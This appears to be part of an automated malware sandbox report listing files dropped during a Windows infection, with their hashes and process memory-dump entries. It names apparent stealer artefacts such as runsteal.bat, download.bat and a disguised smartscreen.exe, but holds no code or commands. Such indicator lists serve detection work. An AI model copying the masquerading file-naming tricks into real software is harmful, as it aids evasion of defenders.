memory/1056-16-0x0000000000C90000-0x000000000113F000-memory.dmp

memory/4924-17-0x0000000000940000-0x0000000000DEF000-memory.dmp

memory/4924-18-0x0000000000940000-0x0000000000DEF000-memory.dmp

memory/4924-19-0x0000000000940000-0x0000000000DEF000-memory.dmp

memory/4924-20-0x0000000000940000-0x0000000000DEF000-memory.dmp

memory/4924-21-0x0000000000940000-0x0000000000DEF000-memory.dmp

memory/4924-22-0x0000000000940000-0x0000000000DEF000-memory.dmp

memory/4924-23-0x0000000000940000-0x0000000000DEF000-memory.dmp

memory/4924-24-0x0000000000940000-0x0000000000DEF000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\1012475001\wL3EGdM.exe

MD5 a67e34baacfca98f323981d3b0087f3b
SHA1 d22ccae2971df83812acaebc750d9a2c87357fe5
SHA256 6092579a997945b10d3f279693baa004d180417ccfec941c45eb20705a2b4706
SHA512 39c7a33ab14e518a09f4e022c1c61c8b5a88417af3ce5a1769ab8c0fa328a178fcd79a098c4c7f3344df75e2b7cd22ebf6a88d43ad61599c53a3c89d54c29d6d

memory/4924-51-0x0000000000940000-0x0000000000DEF000-memory.dmp

memory/4924-52-0x0000000000940000-0x0000000000DEF000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\Audit

MD5 9da23439e34b0498b82ae193c5a8f3a8
SHA1 ae20bbe7fac03c94e42f4dd206d89003faae7899
SHA256 0f241cc0324871a1a900a7ac0edf889a8d12875b1072f44856cc979a4b7a77ac
SHA512 cd4b262753b4f5f1dac09c20fa64ebdee00cf4a3fce92287a7439df943ea65bdf8569f541c2668b2164139b91facccfb3c98db8ad8f686637f4e317583cc98a2

C:\Users\Admin\AppData\Local\Temp\1012589001\d9c5b97a2f.exe

MD5 623d073b8d01e00cbb5294ff07fe238a
SHA1 c3aeeb4de6cd38209944e7a1c3ecaa3f411f8775
SHA256 ce50862f51244b9dce6dbde2bc96fa852cff8ca84b720797894a3f43f4e293ca
SHA512 dc1fe9e39173bfd1e2722125b1385cf8c15e2570b65c1d5acb320a70d073d39a1a25f3665a87ccb3b8a0aaf7b7e63edb21e8e3cd4c3ac27e9cda237b54979824

memory/3956-140-0x0000000000400000-0x0000000000C62000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\1012590001\628cb6a5aa.exe

MD5 bd8e9783c400bd3e1062102ea7efc071
SHA1 5de634ac724beb913fc431da4474635969ef4579
SHA256 5892cf800275fb41ba0b88395a14bd8d1ddf35d7bbcdb0e064f7bec4b2eaa894
SHA512 84202fd36089564b54d010ac30508f8e97970802bfc0d87c4957c85f02b82fd4411f776dd1e44d5e78cc91ce9d00651341d69d2bc9f0c17bcc46d4fdf928bfaf

memory/1056-260-0x0000000000530000-0x00000000009D5000-memory.dmp

memory/4924-337-0x0000000000940000-0x0000000000DEF000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\Commissioner

MD5 6ee7ddebff0a2b78c7ac30f6e00d1d11
SHA1 f2f57024c7cc3f9ff5f999ee20c4f5c38bfc20a2
SHA256 865347471135bb5459ad0e647e75a14ad91424b6f13a5c05d9ecd9183a8a1cf4
SHA512 57d56de2bb882f491e633972003d7c6562ef2758c3731b913ff4d15379ada575062f4de2a48ca6d6d9241852a5b8a007f52792753fd8d8fee85b9a218714efd0

C:\Users\Admin\AppData\Local\Temp\Dentists

MD5 895c5374a042a9e6c78c673690cd2275
SHA1 9dfe1b532f958f678de2bac7c74646e007a8fa14
SHA256 226099aac21e8d4a671a68b37d204339703fb696b6cc5aa30311fb55d6ab2147
SHA512 130af34bb1d12db8e86b930d8e490754687e1381a0104ac4c98cc2f02ff7fc4ed9e1d549121a013e1c32663a00d1dc8eb20d2f9831feb3c7eb17bf61a1d8d52c

C:\Users\Admin\AppData\Local\Temp\Flavor

MD5 d9182f7a263f19b9876e7e1568e6c760
SHA1 d0683b5a7247a2f4a69473165d2c2649f2e1c01f
SHA256 4efff79e94f136f9bbaed62501810937785831b8c10ee9eb675ceae24cf3c4c9
SHA512 85582b94da822580eb26bc477440d87fb0a9ed98e3b75166cd96c2a18c88367c8bdd808fc43c52c2078e625efd81983e9f2e733272289833700649ad58a96a9b

C:\Users\Admin\AppData\Local\Temp\1012591001\91f0bbb4f8.exe

MD5 f18df05d8617aecd511f2074dd84843c
SHA1 9203a2f1b90425ab15b5ca0785b9a406dd9ed37f
SHA256 c898a6d03e65d0e212cca04c6035c9c9a23cfe504f7e72179746709b0a12889a
SHA512 57c729f1f8b4956825e35a153b0a421324a284e688702da43a11eb2cb092aea46cd730e8099d633c54b3b0c212ce8d0a6dcb0a0b12aa4095105c4fb70b89caf1

C:\Users\Admin\AppData\Local\Temp\Disturbed

MD5 0e2df9a4f4d78ad0299f0377d417b39e
SHA1 a2452ab3b04b480dfc2a58a416762e280254751f
SHA256 8834f63f09734b9f284437f26cba4909ce9ae1aceafa27e2bcd7531c1a7479df
SHA512 d8194f24cc02fc030c7cf1dab5970257a79b8bcc887a8ff1ccd104e94ea809dcd266b056c80e6a0e73cba71f81e654389025c939e3135f6fafca9d51737812b8

C:\Users\Admin\AppData\Local\Temp\Artistic

MD5 d35007cc8b2860b1fe9ee861e1f2846d
SHA1 58638fd185601506b3b13fe254065aeb7edff28c
SHA256 de1e4dbe18f0b926b49aceb10157bc7f542409bad6242422efef3b831608a037
SHA512 45f851201656cb19c89274d124a7625a4c9fe12f412616a84458aa1857c61455126264416ff7fa1c9ffa99b994613baecfacd1f8179240a5021c7e5b867ea068

C:\Users\Admin\AppData\Local\Temp\Revenue

MD5 aabc90b85b9c3b51543de0339d29778e
SHA1 299f5e2ca9326e0a5feefb4fc7b05da93cfd11a1
SHA256 9a0a3567f4c9b9ca46fbf41d65cdd5ce464b0efe42d6aaf7cff840addbe05d60
SHA512 3d951489d7d46874909bfd82e9cac346bdd15bbb485fc76e1ed7d6fe7bb51a7649d1f649b75bb6f6f1b6f10ea16113cd01c20aa7ea85d038fcb7fe317082edf3

C:\Users\Admin\AppData\Local\Temp\Soundtrack

MD5 b75737c804ca9949cc63bd42c945a5e6
SHA1 75c0490174adc40d1824b1024021b82dd5c762b7
SHA256 628068ee856d68776d6e9b755cd42d7a5a46af1a2a6a2c22e65db95b5d2d8f2c
SHA512 58fedd2bd6318d4b93de429d184701e059321c16872cafc978837c29985404bf432e4a2701894f7f67045f9684da40c8e14f9f557da3398c5d6eeca2e18faca7

C:\Users\Admin\AppData\Local\Temp\Zip

MD5 84f05dddefb1c72567827be553fe67fe
SHA1 c2ebcc4de3439a8206aa8faac90312bfb207ce4f
SHA256 b7de8d92196f323eb9a6237b9e902461569fd093b36e1988dee9de2ab157bb12
SHA512 99954fa07fe7cc0e54dbd0af09b32507cd998c8b44cb63f1ffe8e30667b6d1bb0949a6c95b60e40e73f0b0bb3f11e79f8fa23f696032118210cd10f03eec2904

C:\Users\Admin\AppData\Local\Temp\Proceeds

MD5 de061b898e12d89c92409f220918347f
SHA1 6b571edab30dcc4d5518e5bebb296d1f7bf5414c
SHA256 70fda66f3ea2607d6cff63d0a6a7258577690d2a9bc5105bb529889ce025d1c2
SHA512 61d94f04572643dc4274aedda51e7cb6bcccefcfa4556e6d87f94195ddf90ffbeb65909688c7bc3407f244021cc6dff0c8692fd7835ee61e6a43a0394a693a2b

C:\Users\Admin\AppData\Local\Temp\Justice

MD5 774df02c553d130dde3aa7496b64ebed
SHA1 e2a4aab8c3b654bd022662045fa70413a80e55f9
SHA256 ae9283c1a14b751639a75592295d85105954b761737ab77fc1e667a1498f2e9e
SHA512 c132cdf383e4fa32362d50768898ed9c6cd1e306056d066168a8ac1ee3ea7953424ff3b241ff1e0376b99b91f566b698bfef07da9bc45471097a6637dc154d11

memory/4976-420-0x00000000006F0000-0x0000000000BEA000-memory.dmp

memory/3956-419-0x0000000000400000-0x0000000000C62000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\491505\B

MD5 0a1e63fc10dd1dbb8b2db81e2388bf99
SHA1 67ad39aabbf4875bc1b165ccd5afc40194d1d3c8
SHA256 122991768f589431b9166a4e22523bf48a53efff73fc2b191955e604196541b7
SHA512 94c50f06e1d157381b9d0746044b5d015e2946b44291d92739783cb3ed9e91371cf7d1b981d3108d910d7a7000810fe69fbe6590f9a84f822b671866ab9db5fc

memory/4976-453-0x00000000006F0000-0x0000000000BEA000-memory.dmp

memory/3956-454-0x0000000000400000-0x0000000000C62000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\1012592001\b9edc67fa3.exe

MD5 4a113390d43e07f23b940f5395802b01
SHA1 7451bb1a01bb006b6a69449c45310c23a79ad900
SHA256 cf265dc6c405c9d0b3e48728139c6dac24a04840091a315c34b8f7852a2f517b
SHA512 b37c7a7eea7a992f363b8a58f069b13f4c8936f8cc2037e86c57fa5b56b3a7195d7816fd91db6e14f2bdbda30898e374b6dcc839adb94c475a7c19f50f9f9f02

memory/1056-477-0x0000000000530000-0x00000000009D5000-memory.dmp

memory/1056-478-0x0000000000530000-0x00000000009D5000-memory.dmp

memory/4880-480-0x0000000000940000-0x0000000000DEF000-memory.dmp

memory/4880-482-0x0000000000940000-0x0000000000DEF000-memory.dmp

memory/4924-483-0x0000000000940000-0x0000000000DEF000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\1012593001\8f8b7f7520.exe

MD5 159fd820eec2647575a520c273e83c4c
SHA1 83d9f35adee5e6129083df1c035840e796496faa
SHA256 49bf2a693d8813f89a4cbea5e6d76f032f6120a40b5ccfb0d439f0eb23e24b39
SHA512 5fbc084b754c573147583c5be13a32f0a138a0e3b63edf5eedb8993c21585a32ed015e6eb564d411c90147789603a1a1b0532882394d1f2d39604b1260bef2ee

memory/3196-502-0x0000000000630000-0x00000000008EC000-memory.dmp

memory/3196-503-0x0000000000630000-0x00000000008EC000-memory.dmp

memory/3196-504-0x0000000000630000-0x00000000008EC000-memory.dmp

memory/1056-506-0x0000000000530000-0x00000000009D5000-memory.dmp

memory/3956-508-0x0000000000400000-0x0000000000C62000-memory.dmp

C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\85mw8mk9.default-release\activity-stream.discovery_stream.json.tmp

MD5 a678499d9e8c39e69233e263d73d3391
SHA1 4a2bc73b6ed2daaf8c2eb8fe0139719fd3d12377
SHA256 f88a2bc670df6a43025ab69138fabea4344f5e2d36fd3f69040f60895b458510
SHA512 f4f29807bb9ebdeb00ee9923c7d4c2a3fe05246f19c6473048ff5924c8418ae20af60931f4e0153a3b3f0f0dde1635dfbebe9efb3f5359d03b0f24d8b313e3aa

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\85mw8mk9.default-release\datareporting\glean\db\data.safe.tmp

MD5 8cfb8ce1a4be9b80dffd957c6246d450
SHA1 9b49ad5ae3606664e7f078b785c0f49dfb1ba6ab
SHA256 a17ebe51f44f2badd79038b8dbcec2e8048253de32b194ecfa5f7e76ad0fde9e
SHA512 f65735adf483e21b40b124dbe4cc528b6df54658834ab873be4148f5f36491af5beb8dac7e3c2a02f568127f4401f87b560a030bcf51af5596676c490a032cfd

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\85mw8mk9.default-release\datareporting\glean\pending_pings\42ec8a01-e3b2-4c0b-961c-0694afd3056a

MD5 212c0036733e86fcbb127820f7353de2
SHA1 fc8716214f84648632b7d5510566d7916f6b3d6e
SHA256 4d9fbc6840bc383c5942ea1326880930eed92c27b2557ff813404f4ba85573be
SHA512 05550238af2badab78df21d668cbf8f2f3af17efefca885b4a4647944c183308dad59883f45af0c57c193c62d67dd59f3ec3029d474f041aef213a15dcab4505

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\85mw8mk9.default-release\datareporting\glean\pending_pings\bb10be38-70f8-4728-ab9b-b68bf2b93fee

MD5 b1a92cf9d121eede5ee57fd107afe61a
SHA1 0303eb15a5c4adc3538f23773fdc66c3ec3810d3
SHA256 accd80c976e27730102c220d479e219adab1c0868a89a33ce7598b47735e8306
SHA512 6042ab754e9a31f52f63b07427a10a45e3c2510aafa0b3f50e5060d486eadf60d5677e0b64ea65cfcddcf3cf39a18f6bc205fabd5067cdc2ef116a5c9d06727a

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\85mw8mk9.default-release\AlternateServices.bin

MD5 50acef891911afd2587ab66c4baf8494
SHA1 6c2aef5a2c357aef052bf2646606b85e434258cc
SHA256 ca9257cd292091cc9efa0e4a25aeffed9541b54e8cb153f48440093caf8f1427
SHA512 be594d0ecd02306f67abf64cc77a4495876145ff2b9851ab7aa109f8414a7d83927fa0a87198f8f4d374e5c4c0607f1537afb7a38a449fd06f94ce21f784ef4f

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\85mw8mk9.default-release\prefs.js

MD5 c24cfa12c04c2a51386b08b08d3d25e8
SHA1 8ae7b50b15df68892e321b7b599e2bf11a7d65c4
SHA256 2c44f524ebe8e2b8b3586f57bd9f23f4264528d6758f38b7488199079a66e692
SHA512 fc06923ffd09b0120563ab4369f7e5794d77b329a761c7434e62a147d85308ec88e2b818240251e82e9f8d9eab17243121ffee1ad25e1f676ba5c0f515fb2176

C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\85mw8mk9.default-release\settings\main\ms-language-packs\browser\newtab\asrouter.ftl

MD5 96c542dec016d9ec1ecc4dddfcbaac66
SHA1 6199f7648bb744efa58acf7b96fee85d938389e4
SHA256 7f32769d6bb4e875f58ceb9e2fbfdc9bd6b82397eca7a4c5230b0786e68f1798
SHA512 cda2f159c3565bc636e0523c893b293109de2717142871b1ec78f335c12bad96fc3f62bcf56a1a88abdeed2ac3f3e5e9a008b45e24d713e13c23103acc15e658

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\85mw8mk9.default-release\prefs.js

MD5 bbce068d5657afc4c5f5a283e89b7a0b
SHA1 c8b8ccc5cd4316066dbe7f2de5414f2ddb28364d
SHA256 bbb839c1146de172a1fa06a60c24ffb2f82f66c9cc9a8d68cf9313b68e5d8954
SHA512 24fbd68b79a8b22ce22e32572c1892ee0f2b47ea43e0814d35a4b6d853ec203db9c00cae5010b87478fcb2ce6a257c425ed526dd7ec89b103e7d39cef394247f

memory/4924-834-0x0000000000940000-0x0000000000DEF000-memory.dmp

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\85mw8mk9.default-release\prefs-1.js

MD5 fc06e482610963b3dfc433d009ee864a
SHA1 17c7cb8d1ac199f9ee7f496a20059c38a9b686c9
SHA256 24f8e9c836f85316a5be50905f34eba3ff16826ba5ec710d5d80d1ab2d895585
SHA512 17c02a2176b93f80e59417f1b1043c1e7393e7e7894be0159e7b1db339153695925e3674994b98afcb67de5d2db8d61bc0b9d1f4e55a3b61e7ca251c395f5bd6

memory/3196-871-0x0000000000630000-0x00000000008EC000-memory.dmp

memory/3196-875-0x0000000000630000-0x00000000008EC000-memory.dmp

memory/3956-876-0x0000000000400000-0x0000000000C62000-memory.dmp

memory/4924-888-0x0000000000940000-0x0000000000DEF000-memory.dmp

memory/3956-893-0x0000000000400000-0x0000000000C62000-memory.dmp

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\85mw8mk9.default-release\datareporting\glean\db\data.safe.tmp

MD5 507850023a4693c91c2e02d1a5300a43
SHA1 2b65034d79ee54842ae7b996224ec00077e0ddc3
SHA256 5099d110ba10ba1e5e336ba890ae862c4b92b30e0f640af8bfaf56b47c1b6bca
SHA512 9518fcca07c0f6e771d7be82b5c2ccd925061d147dfeca85a1801eef475106ffff35b3431eb26df95fb1ab5d163811852917685fe6e105c441656fabd1447b3e

C:\Users\Admin\AppData\Local\Temp\tmpaddon

MD5 09372174e83dbbf696ee732fd2e875bb
SHA1 ba360186ba650a769f9303f48b7200fb5eaccee1
SHA256 c32efac42faf4b9878fb8917c5e71d89ff40de580c4f52f62e11c6cfab55167f
SHA512 b667086ed49579592d435df2b486fe30ba1b62ddd169f19e700cd079239747dd3e20058c285fa9c10a533e34f22b5198ed9b1f92ae560a3067f3e3feacc724f1

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\85mw8mk9.default-release\gmp-gmpopenh264\2.3.2\gmpopenh264.dll

MD5 842039753bf41fa5e11b3a1383061a87
SHA1 3e8fe1d7b3ad866b06dca6c7ef1e3c50c406e153
SHA256 d88dd3bfc4a558bb943f3caa2e376da3942e48a7948763bf9a38f707c2cd0c1c
SHA512 d3320f7ac46327b7b974e74320c4d853e569061cb89ca849cd5d1706330aca629abeb4a16435c541900d839f46ff72dfde04128c450f3e1ee63c025470c19157

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\85mw8mk9.default-release\gmp-gmpopenh264\2.3.2\gmpopenh264.info

MD5 2a461e9eb87fd1955cea740a3444ee7a
SHA1 b10755914c713f5a4677494dbe8a686ed458c3c5
SHA256 4107f76ba1d9424555f4e8ea0acef69357dfff89dfa5f0ec72aa4f2d489b17bc
SHA512 34f73f7bf69d7674907f190f257516e3956f825e35a2f03d58201a5a630310b45df393f2b39669f9369d1ac990505a4b6849a0d34e8c136e1402143b6cedf2d3

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\85mw8mk9.default-release\prefs-1.js

MD5 fa8e66edf858fed3afd8f1c33bf664b3
SHA1 34ac9ed76881652050f25f2654fe10a1dcc37bce
SHA256 67d0ed4ed2c4a57e9407820ca78927e25a13ec1fe3d493da29bd55d5a0f27f07
SHA512 904feb1739771df25a6ef70636d4b0b5cdb17daff4a2a2f78645fd507229633cd2bafad8a6827207bcf90d7656836fbdce6c60ad4aa0b2c8ea3214308900377f

C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\85mw8mk9.default-release\cache2\entries\92F4D5A4F9CED6E2E644D803AEE3647A0EA4D984

MD5 5fc38fd42feec29028de742cca254405
SHA1 9855e554853fa462bd98b6abc64fa94ba600e0c3
SHA256 02800a8f4305db301d4e72dea9914d2e74f0049c53da226f558ae7d50d93a306
SHA512 7acf2926e17aeb7e96ac7b7a12211697496f22b719a329539a3923d76a8175fa0fb1463eeddcec3454efceeab9b2e47bf72d99bad4e61d9c227ec1e0b86458b2

memory/4924-1014-0x0000000000940000-0x0000000000DEF000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\tmpaddon-1

MD5 0a8747a2ac9ac08ae9508f36c6d75692
SHA1 b287a96fd6cc12433adb42193dfe06111c38eaf0
SHA256 32d544baf2facc893057a1d97db33207e642f0dacf235d8500a0b5eff934ce03
SHA512 59521f8c61236641b3299ab460c58c8f5f26fa67e828de853c2cf372f9614d58b9f541aae325b1600ec4f3a47953caacb8122b0dfce7481acfec81045735947d

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\85mw8mk9.default-release\gmp-widevinecdm\4.10.2710.0\manifest.json

MD5 bf957ad58b55f64219ab3f793e374316
SHA1 a11adc9d7f2c28e04d9b35e23b7616d0527118a1
SHA256 bbab6ca07edbed72a966835c7907b3e60c7aa3d48ddea847e5076bd05f4b1eda
SHA512 79c179b56e4893fb729b225818ab4b95a50b69666ac41d17aad0b37ab0ca8cd9f0848cbc3c5d9e69e4640a8b261d7ced592eae9bcb0e0b63c05a56e7c477f44e

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\85mw8mk9.default-release\gmp-widevinecdm\4.10.2710.0\widevinecdm.dll

MD5 daf7ef3acccab478aaa7d6dc1c60f865
SHA1 f8246162b97ce4a945feced27b6ea114366ff2ad
SHA256 bc40c7821dcd3fea9923c6912ab1183a942c11b7690cfd79ed148ded0228777e
SHA512 5840a45cfdb12c005e117608b1e5d946e1b2e76443ed39ba940d7f56de4babeab09bee7e64b903eb82bb37624c0a0ef19e9b59fbe2ce2f0e0b1c7a6015a63f75

memory/3956-1197-0x0000000000400000-0x0000000000C62000-memory.dmp

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\85mw8mk9.default-release\prefs-1.js

MD5 dc54a77b3d68c4b74a535bb81a5b1559
SHA1 26b8318849c943c467423d4187e1ba0e1d27231c
SHA256 f30296c6ae7013f2b2be48332ab9f4097101063d2cce49900e42a014d5bfbaee
SHA512 f699d0e6beb7214f11ee7a1c473a606f476ba53350fc8f9c8895ce56bf89e400e9192623e493b892ca0d2d434556e4089228c907612a97280c8ca63569534ce3

memory/4924-1626-0x0000000000940000-0x0000000000DEF000-memory.dmp

memory/3956-2142-0x0000000000400000-0x0000000000C62000-memory.dmp

memory/4924-2619-0x0000000000940000-0x0000000000DEF000-memory.dmp

memory/3956-3152-0x0000000000400000-0x0000000000C62000-memory.dmp

memory/5540-3492-0x0000000000940000-0x0000000000DEF000-memory.dmp

memory/5540-3494-0x0000000000940000-0x0000000000DEF000-memory.dmp

memory/4924-3495-0x0000000000940000-0x0000000000DEF000-memory.dmp

memory/3956-3501-0x0000000000400000-0x0000000000C62000-memory.dmp

memory/4924-3502-0x0000000000940000-0x0000000000DEF000-memory.dmp

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\85mw8mk9.default-release\AlternateServices.bin

MD5 50d9cbfc86063598d36e2f17308107f9
SHA1 b60775ecc55ea344f7cbfc474c9b29370fc576f3
SHA256 4db84cc62edeabe399e8697ef4522889556a101b4f7998fd8f0ac0b4afbaba6c
SHA512 0441e40eafd84fec57115852071198db7950b35013e990cb053a485569215777e976c81eb3e3c9561645dab581aef38e9da317ac0e27f5bb41b01b59101d7012

memory/3956-3506-0x0000000000400000-0x0000000000C62000-memory.dmp

memory/4924-3507-0x0000000000940000-0x0000000000DEF000-memory.dmp

memory/3956-3510-0x0000000000400000-0x0000000000C62000-memory.dmp

memory/6032-3511-0x0000000001160000-0x0000000001564000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\491505\RegAsm.exe

MD5 0d5df43af2916f47d00c1573797c1a13
SHA1 230ab5559e806574d26b4c20847c368ed55483b0
SHA256 c066aee7aa3aa83f763ebc5541daa266ed6c648fbffcde0d836a13b221bb2adc
SHA512 f96cf9e1890746b12daf839a6d0f16f062b72c1b8a40439f96583f242980f10f867720232a6fa0f7d4d7ac0a7a6143981a5a130d6417ea98b181447134c7cfe2

memory/6032-3514-0x0000000001B00000-0x0000000001B0E000-memory.dmp

memory/6032-3515-0x0000000005CC0000-0x0000000005D1C000-memory.dmp

memory/6032-3516-0x0000000006390000-0x0000000006934000-memory.dmp

memory/6032-3517-0x0000000005DE0000-0x0000000005E72000-memory.dmp

memory/6032-3518-0x0000000006290000-0x00000000062A2000-memory.dmp

memory/6032-3519-0x00000000062A0000-0x00000000062A8000-memory.dmp

memory/6032-3521-0x00000000062D0000-0x00000000062D8000-memory.dmp

memory/6032-3520-0x00000000062C0000-0x00000000062C8000-memory.dmp

memory/6032-3522-0x00000000062E0000-0x00000000062F8000-memory.dmp

memory/6032-3523-0x0000000006370000-0x0000000006380000-memory.dmp

memory/6032-3524-0x0000000007070000-0x0000000007698000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_goaqrfbu.ee5.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/6032-3534-0x00000000079C0000-0x00000000079DA000-memory.dmp

memory/6032-3535-0x0000000007A20000-0x0000000007A56000-memory.dmp

memory/6032-3536-0x00000000080E0000-0x000000000875A000-memory.dmp

memory/6032-3537-0x0000000007B00000-0x0000000007B96000-memory.dmp

memory/6032-3538-0x0000000007A90000-0x0000000007AB2000-memory.dmp

memory/6032-3539-0x0000000007C10000-0x0000000007C76000-memory.dmp

memory/6032-3541-0x0000000007C80000-0x0000000007CCA000-memory.dmp

memory/6032-3540-0x0000000007AE0000-0x0000000007AFE000-memory.dmp

memory/6032-3542-0x0000000008760000-0x0000000008AB4000-memory.dmp

memory/6032-3543-0x0000000007F90000-0x0000000007FF6000-memory.dmp

memory/6032-3544-0x0000000008030000-0x0000000008052000-memory.dmp

memory/6032-3545-0x0000000008EA0000-0x0000000008EEC000-memory.dmp

memory/4924-3546-0x0000000000940000-0x0000000000DEF000-memory.dmp

memory/6032-3556-0x000000000A0A0000-0x000000000A0BE000-memory.dmp

memory/6032-3557-0x000000000A2C0000-0x000000000A363000-memory.dmp

memory/6032-3558-0x000000000A470000-0x000000000A47A000-memory.dmp

memory/6032-3559-0x000000000A4A0000-0x000000000A4B1000-memory.dmp

memory/6032-3560-0x000000000A480000-0x000000000A48E000-memory.dmp

memory/6032-3561-0x000000000A4E0000-0x000000000A4F4000-memory.dmp

memory/6032-3562-0x000000000A520000-0x000000000A53A000-memory.dmp

memory/6032-3563-0x000000000A510000-0x000000000A518000-memory.dmp

memory/6032-3564-0x00000000092C0000-0x00000000092CA000-memory.dmp

memory/6032-3565-0x000000000A4E0000-0x000000000AAF8000-memory.dmp

memory/6032-3566-0x0000000009320000-0x0000000009332000-memory.dmp

memory/6032-3567-0x0000000009380000-0x00000000093BC000-memory.dmp

memory/6032-3568-0x00000000094F0000-0x00000000095FA000-memory.dmp

memory/6032-3570-0x00000000097D0000-0x0000000009992000-memory.dmp

memory/3956-3569-0x0000000000400000-0x0000000000C62000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\download.bat

MD5 f2a75175c8082ccd3e1713b00556a6e2
SHA1 2f5dc37978320bc1ca207c0c0aff1240aad6c7cf
SHA256 019157c15709f7d6301cb0fb15f45c054230ea91f06ff817b426d7f6ccb14686
SHA512 011ab44e81d61636d5b1637584faf0701a5b2226289b6200cd89ad97927f52f1c659df626afc2b46edd656960d67934fff97f5e10fd6a7454027d430feafa7a9

C:\Users\Admin\AppData\Local\Temp\smartscreen.exe

MD5 1fed66d1f6b85bda20fe0403ca01c9bd
SHA1 6a3056191a7d8da167285b2bf5f9fa671022c8c1
SHA256 924ee12f6a98aeeb1c7836ec8984f0f93216bfff0433bcd4ee643d33d96db74a
SHA512 0fb1397078689a52d1c77cc239b1e42afa5ff87a3f5b4f825705e9bda1bd2c58bfb50a6067ea0a202fa7edb0a890cbac9314413fc8757c8b75a43fa0b12ef613

memory/5248-3601-0x000001F420D10000-0x000001F420D3E000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\checkmiexe.bat

MD5 d1fdfad5ce7134b1ef5a54cf37001031
SHA1 82e0f4e953b3aeaca622ec071639baf6ae17aadb
SHA256 54f8474d983dc3dd78e3d3289076152651e2f8cc5f30ae3f2740ba15e71cc6a6
SHA512 b6b7b4f134a6b436cd32e39fb645d91acc12482d352158a755359d0f6cbb8fd5bab9351081916b0b638e3ff2bde4b6ac2f6202f3ca58f1146f39defc039e88e7

C:\Users\Admin\AppData\Local\Temp\runsteal.bat

MD5 744f8978db36b4b9db7cb6e5c8c41e08
SHA1 84321921f622d20a4d40c9bef43b7744e74aaee7
SHA256 cedfe277f8c600679365ce2c54a9c303907a0acadc23ed6e6968746d2e8ca468
SHA512 d1584b2134bf3960af33a514b3a9fba69c7eb2fbbc3b0cffe7e493f182b20547f7596012fcc5e6b5ffbefee5a0b7d1afe45eee822cff5b0720ffd6292af2394f

memory/3828-3623-0x000000006EC70000-0x000000006ECBC000-memory.dmp

memory/3828-3633-0x0000000007680000-0x0000000007723000-memory.dmp

memory/3828-3622-0x0000000007640000-0x0000000007672000-memory.dmp

memory/3828-3634-0x0000000007990000-0x00000000079A1000-memory.dmp

memory/5500-3636-0x000000006EC70000-0x000000006ECBC000-memory.dmp

memory/3828-3635-0x00000000079E0000-0x00000000079F4000-memory.dmp

memory/4924-3646-0x0000000000940000-0x0000000000DEF000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

MD5 4280e36a29fa31c01e4d8b2ba726a0d8
SHA1 c485c2c9ce0a99747b18d899b71dfa9a64dabe32
SHA256 e2486a1bdcba80dad6dd6210d7374bd70ae196a523c06ceda71370fd3ea78359
SHA512 494fe5f0ade03669e5830bed93c964d69b86629440148d7b0881cf53203fd89443ebff9b4d1ee9d96244f62af6edede622d9eacba37f80f389a0d522e4ad4ea4

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 8970ae5715dbb32ef2975612a3e00425
SHA1 d459738421b299d9d04884d4ff23e384d9a9213f
SHA256 a466aed52f0b6da075800fe2af7ca368caba3533dc01e45b6cb39101aeb53a0b
SHA512 f909623d43cf078bd7fa14ed94e68007a17b15fa62fa3c00e25f6caa504ef153f154870f991de70c978f74898214349db39a90cc99e154ec47d31b73d37b7ebe

C:\Users\Admin\AppData\Local\Temp\downloaded_script.bat

MD5 da7552eed00789bd53f831e67cf54f8d
SHA1 653b2ec2b0975ab4b11f1c35a10e307c95450f17
SHA256 5cb4de27952514f557cf52a3a90b68f7c62a512732e799c766a85c4f7905f38f
SHA512 f618164b414a91ccb3569b85fad155fbb55defc55dfc5e2a48ee59f25307182ab2e3d9f8dddffc950cd6397442a876922608c0bbcc447ec0fc56f12446418bfc

memory/5500-3669-0x0000000007970000-0x0000000007981000-memory.dmp

memory/5500-3680-0x00000000079B0000-0x00000000079C4000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 ddae79f83b34ee537c9802193e5dba7f
SHA1 1e250eb79caf50db3289688eece14a6be214fe6a
SHA256 08131b07b49c79232b75b64bfa16a24874f2bd1fdbaf04eb2fc2ff03ae479f9b
